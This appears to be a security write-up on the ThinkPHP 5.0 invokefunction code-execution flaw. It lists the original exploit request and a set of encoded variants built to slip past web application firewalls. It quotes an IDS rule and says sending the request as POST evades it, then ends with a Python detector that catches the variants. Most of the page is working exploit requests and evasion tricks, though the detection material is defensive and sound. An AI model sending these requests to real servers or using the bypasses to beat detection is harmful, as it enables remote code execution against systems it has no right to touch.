ThinkPHP Code Execution Vulnerability: WAF Bypass

Original payload:

```
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1
```

The `/\` is not required; it can be replaced with other characters.

BYPASS (each line shows the replacement characters, then the request):

```
/ /index.php?s=index%2f%00think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1
| /index.php?s=index%7c%00think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1
/ /index.php?s=index%00%2fthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1
| /index.php?s=index%00%7cthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1
/\ /index.php?s=index%2f%5cthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1
</ /index.php?s=index%3c%2fthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1
|\ /index.php?s=index%7c%5cthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1
<| /index.php?s=index%3c%7cthink\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1
```

Non-whitespace characters (`<xxxxxx|`, `<xxxxxx/`):

```
<%08| /index.php?s=index%3Cxxxx|think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1
<%08/ /index.php?s=index%3Cxxxx/think\app/invokefunction&function=call_user_func_array&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1
```

Watcher Lab (守望者实验室) IDS detection rule:

```
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"this is thinkphp5.0 command execution......"; flow:established,from_client; content:"GET"; http_method; content:"?s=index/think\\app";http_uri; sid:80239763; rev:1;)
```

This rule can be bypassed simply by sending the request as a POST.
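The rule above keys on the GET method and one literal separator, which are exactly the parts the variants change. As an added example (not from the original post or from Watcher Lab), this Python code compares a simplified stand-in for that rule with a method-agnostic match on the percent-decoded `s` parameter; the function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The part every variant on this page still carries after decoding.
# PHP class names are case-insensitive, so the match is too.
ROUTE_RE = re.compile(r"think\\app/invokefunction", re.IGNORECASE)


def legacy_match(method, target):
    """Simplified stand-in for the quoted rule: GET only, literal substring
    of the raw request target (an assumption about how it is evaluated)."""
    return method == "GET" and r"?s=index/think\app" in target


def normalized_match(target):
    """Method-agnostic: percent-decode the query, then look only at `s`,
    ignoring whatever characters precede the controller name."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return any(name == "s" and ROUTE_RE.search(value) for name, value in params)


TAIL = (r"think\app/invokefunction&function=call_user_func_array"
        r"&vars%5b0%5d=md5&vars%5b1%5d%5b%5d=1")

# Constructed sample requests; the request targets reuse strings from the page.
SAMPLES = [
    ("GET", "/index.php?s=index/" + TAIL),        # form the rule was written for
    ("POST", "/index.php?s=index/" + TAIL),       # same target, different method
    ("GET", "/index.php?s=index%2f%00" + TAIL),   # encoded separator plus NUL
    ("GET", "/index.php?s=index%3Cxxxx|" + TAIL), # filler before the separator
    ("GET", "/index.php?s=index/index/hello"),    # benign route (constructed)
]


def evaluate(samples=SAMPLES):
    """Return (method, legacy verdict, normalized verdict) per sample."""
    return [(m, legacy_match(m, t), normalized_match(t)) for m, t in samples]


if __name__ == "__main__":
    for method, legacy, normalized in evaluate():
        print(f"{method:4} legacy={legacy!s:5} normalized={normalized}")
```

Only the first sample trips the stand-in for the original rule, while the decoded match flags all four requests that carry the route and leaves the benign one alone.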